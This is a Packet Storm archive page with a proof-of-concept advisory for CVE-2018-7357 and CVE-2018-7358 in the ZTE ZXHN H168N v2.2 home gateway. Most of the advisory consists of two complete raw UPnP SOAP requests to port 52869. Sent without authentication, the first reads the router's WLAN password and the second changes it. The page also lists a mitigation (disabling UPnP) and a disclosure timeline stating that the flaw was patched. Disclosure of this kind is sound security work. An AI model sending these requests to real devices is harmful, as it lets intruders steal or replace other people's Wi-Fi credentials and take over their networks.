what you don't know can hurt you

ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass

ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass
Posted Dec 11, 2018
Authored by Usman Saeed

ZTE Home Gateway ZXHN H168N suffers from multiple access bypass and information disclosure vulnerabilities.

tags | exploit, vulnerability, bypass, info disclosure
advisories | CVE-2018-7357, CVE-2018-7358
MD5 | 835798e5ebba5abb019adf55717b5e7d

ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass

Change Mirror Download
[*] POC: (CVE-2018-7357 and CVE-2018-7358)




Disclaimer: [This POC is for Educational Purposes , I would Not be


responsible for any misuse of the information mentioned in this blog post]




[+] Unauthenticated




[+] Author: Usman Saeed (usman [at] xc0re.net)




[+] Protocol: UPnP




[+] Affected Harware/Software:




Model name: ZXHN H168N v2.2




Build Timestamp: 20171127193202




Software Version: V2.2.0_PK1.2T5




[+] Findings:




1. Unauthenticated access to WLAN password:




POST /control/igd/wlanc_1_1 HTTP/1.1


Host: <IP>:52869


User-Agent: {omitted}


Content-Length: 288


Connection: close


Content-Type: text/xml; charset="utf-8"


SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys" 1




<?xml version="1.0" encoding="utf-8"?>


<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>




2. Unauthenticated WLAN passphrase change:




POST /control/igd/wlanc_1_1 HTTP/1.1


Host: <IP>:52869


User-Agent: {omitted}


Content-Length: 496


Connection: close


Content-Type: text/xml; charset="utf-8"


SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"




<?xml version="1.0" encoding="utf-8"?>


<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>




[*] Solution:




UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.




[*] Note:




There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.




[+] Responsible Disclosure:




Vulnerabilities identified - 20 August, 2018




Reported to ZTE - 28 August, 2018




ZTE official statement - 17 September 2018




ZTE patched the vulnerability - 12 November 2018




The operator pushed the update - 12 November 2018




CVE published - CVE- 2018-7357 and CVE-2018-7358




Public disclosure - 12 November 2018




Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522







Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    15 Files
  • 2
    Jan 2nd
    15 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    1 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    24 Files
  • 8
    Jan 8th
    15 Files
  • 9
    Jan 9th
    16 Files
  • 10
    Jan 10th
    23 Files
  • 11
    Jan 11th
    17 Files
  • 12
    Jan 12th
    3 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    33 Files
  • 16
    Jan 16th
    23 Files
  • 17
    Jan 17th
    13 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close